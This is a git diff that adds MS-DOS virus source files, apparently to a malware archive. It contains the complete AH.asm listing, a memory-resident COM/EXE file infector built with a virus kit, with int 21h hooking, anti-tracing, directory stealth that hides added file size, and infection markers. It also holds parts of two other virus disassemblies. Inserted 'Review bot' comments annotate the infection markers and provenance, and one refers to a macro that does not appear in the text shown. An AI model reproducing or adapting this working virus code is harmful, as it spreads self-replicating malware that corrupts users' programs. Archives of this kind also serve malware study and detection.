+ int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,cs + mov es,ax + mov ds,ax + mov dx,offset int_24h_entry + mov ax,2524h + mov ds:data_7e,dx ; (936E:0012=0) + mov ds:data_8e,ds ; (936E:0014=936Eh) + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + call sub_5 ; (0450) + call sub_4 ; (0410) + nop + nop + nop + nop + nop +loc_46: + mov cx,80h + mov di,data_47e ; (93CE:0600=41h) + mov si,data_5e ; (936E:0000=0) + cld ; Clear direction + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + mov ax,ds + add ax,60h + mov word ptr ds:[579h],ax ; (936E:0579=0E64h) + nop + nop + mov es,ax + mov ds,ax + pop ax + nop + nop +;* jmp far ptr loc_1 ;*(0E64:0100) + db 0EAh, 00h, 01h, 64h, 0Eh +loc_47: + mov dx,data_46e ; (93CE:05B0=41h) + mov ah,9 + int 21h ; 
DOS Services ah=function 09h + ; display char string at ds:dx +loc_48: + mov ax,4A00h + mov bx,5Fh + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + mov bx,ds:data_45e ; (93CE:002C=0FFFFh) + sub bx,1 + xor ax,ax ; Zero register + mov ds,bx + mov ds:data_48e,ax ; (FFFE:0001=0) + mov bx,cs + add bx,60h + mov dx,cs + sub dx,1 + mov ds,dx + mov ds:data_4e,bx ; (936D:0001=0FFFFh) + mov ah,50h ; 'P' + int 21h ; DOS Services ah=function 50h + ; set active PSP segmnt from bx + push cs + pop ds + jmp short loc_46 ; (0559) + db 'load error', 0Dh, 0Ah, '$' + db 0Ah, '$' + db 0 +data_20 db 'COMMAND.' +data_21 db 43h + db 4Fh, 4Dh, 00h +data_22 db 14h +data_23 db 6 ; Data table (indexed access) +data_24 db 0 ; Data table (indexed access) + db 4, 0 +data_25 dw 7BCh ; Data table (indexed access) +data_26 dw 701h ; Data table (indexed access) +data_27 dw 7BCh +data_28 dw 501h +data_29 db 0 +data_30 db 0FFh +data_31 dw 0A10h +data_32 dw 743h +data_33 dw 3D7Bh +data_34 dw 7B6Eh + db 90h +data_35 dd 28C138Dh +data_37 dd 0A1004EBh +data_39 dw 20h + db 90h, 90h, 4Dh, 10h, 0Ah,0FFh + db 0Fh + db 11 dup (90h) + db 0E9h,0CCh, 03h, 90h, 90h, 90h + db 90h, 90h, 9Ch, 50h, 31h,0C0h + db 2Eh, 38h, 26h,0DAh, 05h, 75h + db 07h +loc_49: + pop ax + popf ; Pop flags + jmp cs:data_37 ; (936E:05E8=4EBh) + cmp di,0 + jne loc_49 ; Jump if not equal + pop ax + popf ; Pop flags + mov ax,3 + iret ; Interrupt return + db 90h, 90h, 90h, 00h, 90h, 00h + db 0FFh,0FFh,0FFh,0FFh,0FFh, 9Ch + db 80h,0FCh, 4Eh, 75h, 02h,0EBh + db 1Ch, 80h,0FCh, 4Bh, 75h, 02h + db 0EBh, 15h +loc_50: + cmp ah,0Eh + jne loc_51 ; Jump if not equal + jmp short loc_53 ; (0654) +loc_51: + cmp ah,40h ; '@' + jne loc_52 ; Jump if not equal + jmp short loc_53 ; (0654) +loc_52: + popf ; Pop flags + jmp cs:data_35 ; (936E:05E4=138Dh) + db 90h +loc_53: + cli ; Disable interrupts + push es + push ds + push di + push si + push bp + push dx + push cx + push bx + push ax + mov cs:data_31,ss ; (936E:05DB=0A10h) + mov 
cs:data_32,sp ; (936E:05DD=743h) + mov al,0FFh + mov cs:data_30,al ; (936E:05DA=0FFh) + mov ax,3524h + int 7Eh ; ??INT Non-standard interrupt. + cmp word ptr cs:data_37,bx ; (936E:05E8=4EBh) + jne loc_54 ; Jump if not equal + mov ax,2524h + mov dx,108h + push cs + pop ds + int 7Eh ; ??INT Non-standard interrupt. +loc_54: + sti ; Enable interrupts + jmp short loc_56 ; (06AA) +loc_55: + cli ; Disable interrupts + xor ax,ax ; Zero register + mov cs:data_30,ah ; (936E:05DA=0FFh) + mov ss,cs:data_31 ; (936E:05DB=0A10h) + mov sp,cs:data_32 ; (936E:05DD=743h) + pop ax + pop bx + pop cx + pop dx + pop bp + pop si + pop di + pop ds + pop es + popf ; Pop flags + sti ; Enable interrupts + jmp cs:data_35 ; (936E:05E4=138Dh) + db 90h +loc_56: + pop ax + pop bx + push bx + push ax + cmp ah,4Bh ; 'K' + je loc_61 ; Jump if equal + cmp ah,40h ; '@' + jne loc_57 ; Jump if not equal + jmp short loc_60 ; (06CC) +loc_57: + cmp ah,0Eh + jne loc_58 ; Jump if not equal + jmp short loc_55 ; (0687) +loc_58: + cmp ah,4Eh ; 'N' + jne loc_55 ; Jump if not equal + jmp short loc_55 ; (0687) + db 90h +loc_59: + jmp loc_62 ; (0783) +loc_60: + mov ax,0Fh + cmp cs:data_29,al ; (936E:05D9=0) + jb loc_55 ; Jump if below + ja loc_59 ; Jump if above + cmp bx,4 + jbe loc_55 ; Jump if below or = + mov bx,1 + push cs + pop ds + add ds:data_11e,bx ; (936E:00FA=0) + mov ah,2Ch ; ',' + int 7Eh ; ??INT Non-standard interrupt. 
+ cmp dh,ds:data_11e ; (936E:00FA=0) + ja loc_55 ; Jump if above + mov bx,data_3e ; (0A10:000E=1) + add bx,data_32 ; (936E:05DD=743h) + mov ss:[bx],bx + jmp short loc_55 ; (0687) + db 01h, 90h, 90h, 90h +loc_61: + jmp loc_63 ; (1A7F) + db 'Hello - Copyright S & S Internat' + db 'ional, 1990', 0Ah, 0Dh, '$' + db 1Ah, 41h, 41h + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAA' +loc_62: + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAA' +loc_63: + mov ah,9 + mov dx,offset data_14 ; (936E:0103=90h) + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + int 20h ; Program Terminate + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.ah.asm b/MSDOS/Virus.MSDOS.Unknown.ah.asm new file mode 100644 index 00000000..b0f9551c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ah.asm 
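Review bot: The `movseg` macro at the top of this file has every `ifidn` test with empty operands (`ifidn ,`), so the listing cannot assemble as stored; the bracketed operands were probably lost in extraction, and together with the disassembler-style header (`Passes: 5 Analysis Options on: none`) and the absolute-address comments such as `(936E:05DB=0A10h)` this reads as a recovered listing, not build source. A header line stating that — e.g. `; Archival disassembly listing; not assemblable as stored` — would stop the next reader from treating it as a buildable file. The embedded `'Hello - Copyright S & S International, 1990'` string and the long `'AAAA…'` filler run after `loc_61` suggest the sample was padded or processed by an AV vendor before it was archived, which is provenance worth recording in the same header. The file section is complete within the hunk (`seg_a ends` / `end start`).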
@@ -0,0 +1,415 @@ +; AH.asm : Mess with White Shark and you'll be eaten alive! +; Created with Biological Warfare - Version 0.90 by MnemoniX + +PING equ 0AE8Eh +PONG equ 0A09Eh +STAMP equ 31 +MARKER equ 05753h + +code segment + org 0 + assume cs:code,ds:code + +start: + db 0E9h,3,0 ; to virus +host: + db 0CDh,20h,0 ; host program +virus_begin: + call $ + 3 ; BP is instruction ptr. + pop bp + sub bp,offset $ - 1 + + push ds es + + cli + mov ax,PING ; mild anti-trace code + push ax + pop ax + dec sp + dec sp + pop bx + cmp ax,bx + je no_trace + hlt + +no_trace: + sti + in al,21h ; lock out & reopen keyboard + xor al,2 + out 21h,al + xor al,2 + out 21h,al + + mov ax,PING ; test for residency + int 21h + cmp bx,PONG + je installed + + mov ax,es ; Get PSP + dec ax + mov ds,ax ; Get MCB + + sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64 + sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64 + mov es,word ptr ds:[12h] + + push cs ; copy virus into memory + pop ds + xor di,di + mov si,bp + mov cx,(virus_end - start) / 2 + 1 + rep movsw + + xor ax,ax ; capture interrupts + mov ds,ax + + sub word ptr ds:[413h],(MEM_SIZE+1023) / 1024 + + mov si,21h * 4 ; get original int 21 + mov di,offset old_int_21 + movsw + movsw + + mov word ptr ds:[si - 4],offset new_int_21 + mov ds:[si - 2],es ; and set new int 21 + +installed: + call activate ; activation routine + + pop es ds ; restore segregs + cmp sp,MARKER ; check for .EXE + je exe_exit + +com_exit: + lea si,[bp + host] ; restore host program + mov di,100h + push di + movsw + movsb + + call fix_regs ; fix up registers + ret ; and leave +exe_exit: + mov ax,ds ; fix up return address + add ax,10h + push ax + add ax,cs:[bp + exe_cs] + mov cs:[bp + return_cs],ax + + mov ax,cs:[bp + exe_ip] + mov cs:[bp + return_ip],ax + + pop ax + add ax,cs:[bp + exe_ss] ; restore stack + cli + mov ss,ax + mov sp,cs:[bp + exe_sp] + + call fix_regs ; fix up registers + sti + + db 0EAh ; back to host program +return_ip dw 0 +return_cs dw 0 + +exe_cs dw 
-16 ; orig CS:IP +exe_ip dw 103h +exe_sp dw -2 ; orig SS:SP +exe_ss dw -16 + +fix_regs: + xor ax,ax + cwd + xor bx,bx + mov si,100h + xor di,di + xor bp,bp + ret + +; interrupt 21 handler +int_21: + pushf + call dword ptr cs:[old_int_21] + ret + +new_int_21: + cmp ax,PING ; residency test + je ping_pong + cmp ah,11h ; directory stealth + je dir_stealth + cmp ah,12h + je dir_stealth + cmp ah,4Eh ; directory stealth + je dir_stealth_2 + cmp ah,4Fh + je dir_stealth_2 + cmp ah,3Dh ; file open + je file_open + cmp ax,4B00h ; execute program + jne int_21_exit + jmp execute +int_21_exit: + db 0EAh ; never mind ... +old_int_21 dd 0 + +ping_pong: + mov bx,PONG + iret + +dir_stealth: + call int_21 ; get dir entry + test al,al + js dir_stealth_done + + push ax bx es + mov ah,2Fh + int 21h + + cmp byte ptr es:[bx],-1 ; check for extended FCB + jne no_ext_FCB + add bx,7 +no_ext_FCB: + mov ax,es:[bx + 17h] ; check for infection marker + and al,31 + cmp al,STAMP + jne dir_fixed + + sub word ptr es:[bx + 1Dh],VIRUS_SIZE + 3 + sbb word ptr es:[bx + 1Fh],0 +dir_fixed: + pop es bx ax +dir_stealth_done: + iret + +dir_stealth_2: + pushf + call dword ptr cs:[old_int_21] + jc dir_stealth_done_2 + +check_infect2: + push ax bx es + + mov ah,2Fh + int 21h + mov ax,es:[bx + 16h] + and al,31 ; check timestamp + cmp al,STAMP + jne fixed_2 + + sub es:[bx + 1Ah],VIRUS_SIZE + 3 + sbb word ptr es:[bx + 1Ch],0 + +fixed_2: + pop es bx ax + clc ; clear carry +dir_stealth_done_2: + retf 2 + +file_open: + push ax cx di es + call get_extension + cmp [di],'OC' ; .COM file? + jne perhaps_exe ; perhaps .EXE then + cmp byte ptr [di + 2],'M' + jne not_prog + jmp a_program +perhaps_exe: + cmp [di],'XE' ; .EXE file? 
+ jne not_prog + cmp byte ptr [di + 2],'E' + jne not_prog +a_program: + pop es di cx ax + jmp execute ; infect file +not_prog: + pop es di cx ax + jmp int_21_exit + +execute: + push ax bx cx dx si di ds es + + xor ax,ax ; critical error handler + mov es,ax ; routine - catch int 24 + mov es:[24h * 4],offset int_24 + mov es:[24h * 4 + 2],cs + + mov ax,4300h ; change attributes + int 21h + + push cx dx ds + xor cx,cx + call set_attributes + + mov ax,3D02h ; open file + call int_21 + jc cant_open + xchg bx,ax + + push cs ; CS = DS + pop ds + + mov ax,5700h ; save file date/time + int 21h + push cx dx + mov ah,3Fh + mov cx,28 + mov dx,offset read_buffer + int 21h + + cmp word ptr read_buffer,'ZM' ; .EXE? + je infect_exe ; yes, infect as .EXE + + mov al,2 ; move to end of file + call move_file_ptr + + sub dx,VIRUS_SIZE + 3 ; check for previous infection + cmp dx,word ptr read_buffer + 1 + je dont_infect + + add dx,VIRUS_SIZE + 3 + mov word ptr new_jump + 1,dx + + mov dx,offset read_buffer ; save original program head + int 21h + mov ah,40h ; write virus to file + mov cx,VIRUS_SIZE + mov dx,offset virus_begin + int 21h + + xor al,al ; back to beginning of file + call move_file_ptr + + mov dx,offset new_jump ; and write new jump + int 21h + +fix_date_time: + pop dx cx + and cl,-32 ; add time stamp + or cl,STAMP ; for directory stealth + mov ax,5701h ; restore file date/time + int 21h + +close: + pop ds dx cx ; restore attributes + call set_attributes + + mov ah,3Eh ; close file + int 21h + +cant_open: + pop es ds di si dx cx bx ax + jmp int_21_exit ; leave + + +set_attributes: + mov ax,4301h + int 21h + ret + +dont_infect: + pop cx dx ; can't infect, skip + jmp close + +move_file_ptr: + mov ah,42h ; move file pointer + cwd + xor cx,cx + int 21h + + mov dx,ax ; set up registers + mov ah,40h + mov cx,3 + ret +infect_exe: + cmp word ptr read_buffer[16],MARKER + je dont_infect ; infected already + + les ax,dword ptr read_buffer[20] + mov exe_cs,es ; CS + mov exe_ip,ax ; IP + + 
les ax,dword ptr read_buffer[14] + mov exe_ss,ax ; SS + mov exe_sp,es ; SP + mov word ptr read_buffer[16],MARKER + + mov ax,4202h ; to end of file + cwd + xor cx,cx + int 21h + + push ax dx ; save file size + + push bx + mov cl,12 ; calculate offsets for CS + shl dx,cl ; and IP + mov bx,ax + mov cl,4 + shr bx,cl + add dx,bx + and ax,15 + pop bx + + sub dx,word ptr read_buffer[8] + mov word ptr read_buffer[22],dx + mov word ptr read_buffer[20],ax + add dx,100 + mov word ptr read_buffer[14],dx + + pop dx ax ; calculate prog size + + add ax,VIRUS_SIZE + 3 + adc dx,0 + mov cx,512 ; in pages + div cx ; then save results + inc ax + mov word ptr read_buffer[2],dx + mov word ptr read_buffer[4],ax + + mov ah,40h + mov cx,VIRUS_SIZE + 3 + mov dx,offset virus_begin + int 21h + + + mov ax,4200h ; back to beginning + cwd + xor cx,cx + int 21h + + mov ah,40h ; and fix up header + mov cx,28 + mov dx,offset read_buffer + int 21h + jmp fix_date_time ; done + +courtesy_of db '[BW]',0 +signature db 'Mess with White Shark and you'll be eaten alive!',0 + + +activate: + ; Insert your routine here + ret +get_extension: + push ds ; find extension + pop es + mov di,dx + mov cx,64 + mov al,'.' + repnz scasb + ret +int_24: + mov al,3 ; int 24 handler + iret +new_jump db 0E9h,0,0 + +virus_end: +VIRUS_SIZE equ virus_end - virus_begin +read_buffer db 28 dup (?) ; read buffer + +end_heap: + +MEM_SIZE equ end_heap - start + +code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.ahadisk.asm b/MSDOS/Virus.MSDOS.Unknown.ahadisk.asm new file mode 100644 index 00000000..41a32c37 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ahadisk.asm 
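Review bot: The four `equ` constants at the head of this file (`PING`, `PONG`, `STAMP`, `MARKER`) carry no comment, yet they are exactly the artifacts a detection or triage engineer needs, and their meaning is only recoverable by reading the handlers further down. From the visible code: `PING`/`PONG` form the int 21h residency handshake (`cmp ax,PING` in `new_int_21`, answered by `ping_pong: mov bx,PONG`); `STAMP` is the value forced into the low five bits of the file-time seconds field (`and cl,-32` / `or cl,STAMP` in `fix_date_time`) and re-read in `dir_stealth`/`check_infect2` (`and al,31` / `cmp al,STAMP`) to decide which directory entries get `VIRUS_SIZE + 3` subtracted; `MARKER` is written into the EXE header word at offset 16 (`mov word ptr read_buffer[16],MARKER`, tested first in `infect_exe`) and doubles as the COM/EXE discriminator at `cmp sp,MARKER`. Proposed comments on the definitions: `STAMP equ 31 ; infection marker: file-time seconds field & 31 == 31; also keys the size-hiding in dir_stealth` and `MARKER equ 05753h ; infection marker: EXE header checksum word (offset 16) of infected hosts`, with one-line equivalents on `PING`/`PONG` naming the int 21h residency check. Since `VIRUS_SIZE` and `MEM_SIZE` are defined below their first use, a note at the top saying they are forward-referenced `equ`s computed from `virus_end`/`end_heap` would also help a reader placing the size arithmetic in `execute` and `installed`.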
@@ -0,0 +1,4042 @@ + +PAGE 59,132 + +; +; +; AHADISK +; +; Created: 29-Feb-92 +; Passes: 5 Analysis Options on: none +; +; + +data_1e equ 0 +data_2e equ 1 +data_3e equ 3 +data_4e equ 94h +keybd_flags_1_ equ 417h +dsk_recal_stat_ equ 43Eh +dsk_motor_stat_ equ 43Fh +dsk_motor_tmr_ equ 440h +video_mode_ equ 449h +video_port_ equ 463h +timer_low_ equ 46Ch +hdsk0_media_st_ equ 490h +data_16e equ 1000h ;* +data_17e equ 0 ;* +data_18e equ 3 ;* +data_234e equ 7C3Eh ;* + +;-------------------------------------------------------------- seg_a ---- + +seg_a segment byte public + assume cs:seg_a , ds:seg_a + + +; +; +; Program Entry Point +; +; + + +ahadisk proc far + +start: + jmp loc_262 +data_24 db 0, 0 +data_25 dw 0 +data_26 dw 0 +data_27 dw 0 +data_28 db 0 +data_29 db 0 +data_30 db 0 + db 0 +data_31 dw 1 +data_32 db 19h + db 0 +data_33 db ' ', 0 + db 27h, 0 + db '.', 0 + db ' 360 K', 0 + db ' 1.2 M', 0 + db ' 720 K', 0 + db '1.44 M', 0 +data_37 db 0FFh + db 11h,0FFh +data_38 db 1Dh + db 0FFh, 11h,0FFh, 23h +data_39 db 1 + db 0, 2, 0 +data_40 db 23h + db 00h, 3Bh, 00h, 23h, 00h, 47h + db 00h +data_41 db 2 + db 1, 2 +data_42 db 1 +data_43 db 0DFh + db 0DFh,0DFh,0AFh +data_44 db 9 + db 0Fh, 09h, 12h +data_45 db 2Ah + db 1Bh, 2Ah, 1Ah +data_46 db 50h + db 54h, 50h, 6Ch +data_47 db 0FDh + db 0F9h,0F9h,0F0h +data_48 db 70h + db 0 + db 0E0h, 00h + +locloop_2: + jo loc_3 ; Jump if overflow=1 +loc_3: + loopnz $+2 ; Loop if zf=0, cx>0 + + rol byte ptr [bp+si],1 ; Rotate + db 60h, 09h,0A0h, 05h, 40h, 0Bh +data_50 db 2 + db 0, 7, 0, 3, 0, 9 + db 0 +data_51 db 62h + db 01h, 43h, 09h,0C9h, 02h, 1Fh + db 0Bh +data_52 db 6 + db 1, 4, 3 +data_53 db 0 +data_54 dw 0 +data_55 db 0 +data_56 db 0 +data_57 db 2Ah +data_58 db 50h +data_59 db 0 +data_60 db 0, 0 +data_61 dw 0 +data_62 db 0 +data_63 db 0 +data_64 db 0 +data_65 db 0 +data_66 db 0 +data_67 dw 0 +data_68 dw 0 +data_69 db 0 +data_70 db 0 +data_71 db 0 +data_72 db 0 +data_73 db 0 +data_74 db 0 +data_75 db 0 +data_76 db 0 +data_77 db 0 
